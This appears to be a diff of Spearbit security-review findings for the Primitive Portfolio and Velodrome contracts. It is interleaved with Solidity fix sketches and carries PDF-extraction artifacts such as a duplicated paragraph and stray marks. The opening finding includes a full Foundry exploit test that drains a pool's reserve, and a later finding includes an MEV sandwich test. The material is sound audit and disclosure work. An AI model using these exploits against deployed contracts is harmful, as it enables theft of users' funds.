require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large, the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput, as the reserves are unchanged. The swapper will be credited deltaOutput tokens. The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC). This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtual reserve will be computed as liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance).
The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC): This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent computed - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). as 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesnt require any token settlement. 4. settlement is called and the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack 8 is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap ,! 
address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %y \\t %s\", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() ,! // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 ,! / virtualY. 9 // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) ,! // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) ,! // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); ,! instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log(\"attacker asset profit: %s\", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, \"attacker-post-draw-balance-mismatch\"); vm.stopPrank(); } }", + "title": "Unnecessary approve in Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The newly added Zap feature uses max approvals, which are granted to pairs. However, the Pair contract does not pull tokens from the router, and therefore unnecessarily calls approve() in the router. Because of the possibility of specifying a custom factory, attackers will be able to set up approvals from any token to their contracts. 
, "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Unsafe type-casting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the contract we've encountered various unsafe type-castings. invariant Within the _swap function, the next invariant is an int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable is then dangerously down-cast to int128 and assigned to an int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in an int128; if it does not fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. iteration.nextInvariant _getLatestInvariantAndVirtualPrice getNetBalance During account settlement, getNetBalance is called to compute the difference between the \"physical reserves\" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesn't have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here, as a legitimate possible revert would cause fewer issues than an actual overflow. Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. encodeJumpInstruction: cannot encode more than 255 instructions; instructions will be cut off and they might perform an action that will then be settled unfavorably. decodeClaim: fee0/fee1 can overflow. decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and the pool is initialized wrong. decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow, which would provide less liquidity. decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially leading to unfavorable swaps. Other PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast; the function is not used internally. AssemblyLib.toAmount: The typecast works if power < 39, otherwise it leads to wrong results without reverting. This function is not used yet, but consider performing a safe typecast here."
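As an illustration of the recommended safe typecast (a minimal sketch, not the library's actual API), a bounds check before the down-cast turns silent truncation into a revert:

function safeCastToInt128(int256 x) internal pure returns (int128) {
    // Revert instead of silently wrapping when x does not fit in 128 bits.
    require(x >= type(int128).min && x <= type(int128).max, \"int128 overflow\");
    return int128(x);
}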
, + "title": "The current value of a Pair is not always returning a 30-minute TWAP and can be manipulated.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The current function returns a current TWAP. It fetches the last observation and calculates the TWAP between the last observation and now. Observations are pushed every thirty minutes. However, the interval between the current timestamp and the last observation varies a lot; in most cases, the TWAP interval is shorter than 30 minutes. //Pair.sol#L284-L288 uint256 timeElapsed = block.timestamp - _observation.timestamp; @audit: timeElapsed can be much smaller than 30 minutes. uint256 _reserve0 = (reserve0Cumulative - _observation.reserve0Cumulative) / timeElapsed; uint256 _reserve1 = (reserve1Cumulative - _observation.reserve1Cumulative) / timeElapsed; amountOut = _getAmountOut(amountIn, tokenIn, _reserve0, _reserve1); If the last observation was newly updated, timeElapsed will be much shorter than 30 minutes, and the cost of price manipulation is cheaper in this case. Assume the last observation is updated at T. The exploiter can launch an attack at T + 30_MINUTES - 1: 1. At T + 30_MINUTES - 1, the exploiter tries to manipulate the price of the pair. Assume the price is moved to 100x. 2. At T + 30_MINUTES, the exploiter pokes the pair. The pair pushes an observation with the price = 100x. 3. At T + 30_MINUTES + 1, the exploiter tries to exploit external protocols. The current function fetches the last observation and calculates the TWAP between the last observation and the current price. It ends up calculating the two-block-interval TWAP.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }
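A sketch of one possible hardening (hypothetical code; the Observation struct and observations array are assumed to mirror the Pair's storage, and this is not Velodrome's actual implementation): serve the price from an older observation whenever the latest one is too fresh, so the effective TWAP window can never shrink to a couple of blocks.

uint256 internal constant MIN_TWAP_WINDOW = 30 minutes;

function _observationFor(uint256 nowTs) internal view returns (Observation memory obs) {
    obs = observations[observations.length - 1];
    if (observations.length > 1 && nowTs - obs.timestamp < MIN_TWAP_WINDOW) {
        // Latest point is too fresh: step back one slot so timeElapsed >= 30 minutes.
        obs = observations[observations.length - 2];
    }
}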
, { - "title": "Protocol fees are in WAD instead of token decimal units", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has fewer than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token.", + "title": "Calculation error of getAmountOut leads to revert of Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The function getAmountOut in Pair calculates the correct swap amount and token price. //Pair.sol#L442-L444 function _f(uint256 x0, uint256 y) internal pure returns (uint256) { return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * y) / 1e18; } //Pair.sol#L450-L476 function _get_y( uint256 x0, uint256 xy, uint256 y ) internal pure returns (uint256) { for (uint256 i = 0; i < 255; i++) { uint256 y_prev = y; uint256 k = _f(x0, y); if (k < xy) { uint256 dy = ((xy - k) * 1e18) / _d(x0, y); y = y + dy; } else { uint256 dy = ((k - xy) * 1e18) / _d(x0, y); y = y - dy; } if (y > y_prev) { if (y - y_prev <= 1) { return y; } } else { if (y_prev - y <= 1) { return y; } } } return y; } The getAmountOut is not always correct. This results in the router unexpectedly reverting a regular and correct transaction. Within 5s of fuzzing we can find one parameter for which the router will fail to swap. function testAmountOut(uint swapAmount) public { vm.assume(swapAmount < 1_000_000_000 ether); vm.assume(swapAmount > 1_000_000); uint256 reserve0 = 100 ether; uint256 reserve1 = 100 ether; uint amountIn = swapAmount - swapAmount * 2 / 10000; uint256 amountOut = _getAmountOut(amountIn, token0, reserve0, reserve1); uint initialK = _k(reserve0, reserve1); reserve0 += amountIn; reserve1 -= amountOut; console.log(\"initial k:\", initialK); console.log(\"current k:\", _k(reserve0, reserve1)); console.log(\"current smaller k:\", _k(reserve0, reserve1 - 1)); require(initialK < _k(reserve0, reserve1), \"K\"); require(initialK > _k(reserve0, reserve1-1), \"K\"); } After the fuzzer finds a counter-example of swapAmount = 1413611527073436, we can test that the Router will revert when given the fuzzed params. contract PairTest is BaseTest { function testRouterSwapFail() public { Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); DAI.approve(address(router), 100 ether); FRAX.approve(address(router), 100 ether); _addLiquidityToPool( address(this), address(router), address(DAI), address(FRAX), true, 100 ether, 100 ether ); uint swapAmount = 1413611527073436; DAI.approve(address(router), swapAmount); // vm.expectRevert(); console.log(\"fee:\", factory.getFee(address(pair), true)); IRouter.Route[] memory routes = new IRouter.Route[](1); routes[0] = IRouter.Route(address(DAI), address(FRAX), true, address(0)); uint daiAmount = DAI.balanceOf(address(pair)); uint FRAXAmount = FRAX.balanceOf(address(pair)); console.log(\"daiAmount: \", daiAmount, \"FRAXAmount: \", FRAXAmount); vm.expectRevert(\"Pair: K\"); router.swapExactTokensForTokens(swapAmount, 0, routes, address(owner), block.timestamp); } }", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Invariant.getX computation is wrong", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The protocol makes use of the solstat library to compute the off-chain swap amounts. The solstat Invariant.getX function documentation states: Computes x in x = 1 − Φ(Φ⁻¹((y + k)/K) + σ√τ). However, the y + k term should be y − k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. Derivation: y = K·Φ(Φ⁻¹(1 − x) − σ√τ) + k ⟹ (y − k)/K = Φ(Φ⁻¹(1 − x) − σ√τ) ⟹ Φ⁻¹((y − k)/K) + σ√τ = Φ⁻¹(1 − x) ⟹ x = 1 − Φ(Φ⁻¹((y − k)/K) + σ√τ)."
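In code the fix is a sign flip; a hedged sketch of the corrected formula (Gaussian.cdf/Gaussian.ppf and the plain WAD arithmetic are stand-ins for solstat's actual helpers, not its exact signatures):

function getX(int256 y, int256 k, int256 K, int256 sigmaSqrtTau) internal pure returns (int256 x) {
    // x = 1 - cdf( ppf((y - k) / K) + sigma * sqrt(tau) ); the buggy version used (y + k).
    int256 inner = Gaussian.ppf(((y - k) * 1e18) / K) + sigmaSqrtTau;
    x = 1e18 - Gaussian.cdf(inner);
}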
, + "title": "VotingEscrow checkpoints is not synchronized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Delegating token ids does not correctly synchronize the fromBlock variable in the checkpoint; by leaving it not updated, the functions getPastVotesIndex and _findWhatCheckpointToWrite could return the incorrect index.", "labels": [ "Spearbit", - "Primitive", - "Severity: Low Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Liquidity can be (de-)allocated at a bad price", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The required deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y). // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1. MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %s\", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( \"victim used asset/quote for allocate: %s \\t %s\", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3.
MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( \"MEV asset/quote profit: %s \\t %s\", mev_asset_balance - initialBalance, mev_quote_balance - initialBalance ); } }", + "title": "Wrong proposal expected value in VeloGovernor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The expected values of MAX_PROPOSAL_NUMERATOR and proposalNumerator are incorrect: in the current implementation the max proposal is set to 0.5% while the expected value is 5%, and the proposal numerator starts at 0.02% instead of 0.2% as expected.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Missing signextend when dealing with non-full word signed integers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The AssemblyLib uses non-full-word signed integer operations. If the signed data on the stack has not been sign-extended, the two's complement arithmetic will not work properly, most probably reverting. The Solidity compiler does this cleanup, but this cleanup is not guaranteed to be done while using inline assembly.", + "title": "_burn function will always revert if the caller is the approved spender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The owner or the approved spender is allowed to trigger the _burn function. However, whenever an approved spender triggers this function, it will always revert. This is because the _removeTokenFrom function will revert internally if the caller is not the owner of the NFT as shown below. function _removeTokenFrom(address _from, uint256 _tokenId) internal { // Throws if `_from` is not the current owner assert(idToOwner[_tokenId] == _from); As a result, an approved spender will not be able to withdraw or merge a veNFT on behalf of the owner because the internal _burn function will always revert."
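A sketch of the usual fix (hypothetical code shaped after the snippet above, not Velodrome's exact implementation): _burn should resolve the token's actual owner instead of forwarding the caller to _removeTokenFrom.

function _burn(uint256 _tokenId) internal {
    require(_isApprovedOrOwner(msg.sender, _tokenId), \"caller is not owner nor approved\");
    address owner = idToOwner[_tokenId];
    // Pass the real owner, not msg.sender: the caller may only be an approved spender.
    _removeTokenFrom(owner, _tokenId);
}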
, "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulating the same underlying storage (such as Synthetix tokens like SNX and sBTC and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple entrypoint tokens are not safe to be used in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double entrypoint token, crediting the attacker and transferring them the entire balance of the double entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double entrypoint tokens will cancel out.", + "title": "OpenZeppelin's Clones library can be used to cheaply deploy rewards contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin's Clones library allows for significant gas savings when there are multiple deployments of the same family of contracts. This would prove useful in several factory contracts which commonly deploy the same type of contract. Minimal proxies make use of the same code even when initialization data may be different for each instance. By pointing to an implementation contract, we can delegate all calls to a fixed address and minimise deployment costs.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Swap amounts are always estimated with priority fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut, the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually lower than the normal fee, the input amount will be underestimated for non-controllers; the input amount will then be too low and the swap reverts."
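A sketch of the expected selection logic (hypothetical; a swapper argument would have to be threaded through the estimation path, and the field names mirror the finding rather than the actual structs): the priority fee should only be applied when the quoted swapper really is the controller.

// Inside the estimation path (sketch):
uint256 fee = (swapper == pool.controller && _state.priorityFee != 0)
    ? _state.priorityFee // controller swaps pay the priority fee
    : _state.fee;        // everyone else pays the regular fee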
, + "title": "VelodromeTimeLibrary functions can be made unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Running the following fuzz test: pragma solidity 0.8.13; import \"forge-std/Test.sol\"; contract VelodromeTimeLibrary { uint256 public constant WEEK = 7 days; /// @dev Returns start of epoch based on current timestamp function epochStart(uint256 timestamp) public pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } /// @dev Returns unrestricted voting window function epochEnd(uint256 timestamp) public pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK) + WEEK - 1 hours; } } } contract VelodromeTimeLibraryTest is Test { VelodromeTimeLibrary vtl; uint256 public constant WEEK = 7 days; function setUp() public { vtl = new VelodromeTimeLibrary(); } function testEpochStart(uint256 timestamp) public { uint256 uncheckedVal = vtl.epochStart(timestamp); uint256 normalVal = timestamp - (timestamp % WEEK); assertEq(uncheckedVal, normalVal); } function testEpochEnd(uint256 timestamp) public { uint256 uncheckedVal = vtl.epochEnd(timestamp); uint256 normalVal = timestamp - (timestamp % WEEK) + WEEK - 1 hours; assertEq(uncheckedVal, normalVal); } } One can see that both VelodromeTimeLibrary functions will only start to overflow at a ridiculously high timestamp input.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Rounding functions are wrong for negative integers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. The scaleFromWadDownSigned only performs a truncation, rounding negative integers towards zero. This function is used in checkInvariant to ensure the new invariant is not less than the live invariant in a swap: int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote); int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned( pools[poolId].pair.decimalsQuote ); nextInvariantWad >= liveInvariantWad It can happen for quote tokens with fewer decimals, for example, 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero, and nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units."
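For signed values, rounding down has to floor toward negative infinity rather than truncate. A minimal sketch of such a floor division (plain Solidity, not the library's actual assembly):

function scaleFromWadDownSigned(int256 amountWad, int256 factor) internal pure returns (int256 q) {
    q = amountWad / factor; // Solidity division truncates toward zero
    if (amountWad % factor != 0 && (amountWad < 0) != (factor < 0)) {
        q -= 1; // push negative results down toward negative infinity
    }
}

With this, a value like -0.9999e12 scaled down by 1e12 becomes -1 instead of 0, and the invariant check above fails as it should.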
, + "title": "Skip call can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "distribute(address[] memory _gauges) is meant to be used for multiple gauges, but it calls minter.update_period before each call to notifyRewardAmount.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "LPs can lose fees if fee growth accumulator overflows their checkpoint", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Fees (that are not reinvested in the pool) are currently tracked through the accumulator values pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the user's checkpoint is computed and multiplied by their liquidity. The accumulator values are deliberately allowed to overflow, as only the distance matters. However, if an LP does not sync its fees and the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example: the user allocates at pool.feeGrowthGlobalAsset = 1000e36; pool.feeGrowthGlobalAsset grows and overflows to 0 (differenceAsset is still accurate); pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again, so differenceAsset will be zero. If the user only claims their fees now, they'll earn 0 fees."
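For reference, this is the wrap-around distance pattern the accumulator relies on (a generic sketch of the technique, not Portfolio's exact code). It stays correct only while the accumulator advances by less than 2**256 between two syncs of the same position, which is exactly the assumption an unsynced LP can violate:

function feeGrowthDelta(uint256 globalAcc, uint256 checkpoint) internal pure returns (uint256 d) {
    unchecked { d = globalAcc - checkpoint; } // wraps correctly across a single overflow
}

Syncing every position's checkpoint sufficiently often keeps the distance well-defined.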
, + "title": "Change to zero assignment to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is not necessary to subtract the total value from the votes; instead, you should set it directly to zero.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Unnecessary left shift in encodePoolId", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The encodePoolId performs a left shift of 0. This is a noop.", + "title": "Refactor to skip an SLOAD", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is possible to skip an SLOAD by refactoring the code as shown in the recommendation.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "_syncPool performs unnecessary pool state updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _syncPool function is only called during a swap. During a swap the liquidity never changes and the pool's last timestamp has already been updated in _beforeSwapEffects.", + "title": "Tail variable can be removed to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is possible to save gas by freeing the tail slot, which can be replaced by the check weekly < TAIL_START.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Portfolio.sol gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the contract we've identified a number of minor gas optimizations that can be performed. We've gathered them into one issue to keep the issue number as small as possible. L750 The msg.value > 0 check is done also in the __wrapEther__ call. L262 The following subtractions can be optimized in case assets are 0 by moving each instruction within the ifs on lines 256-266: pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); 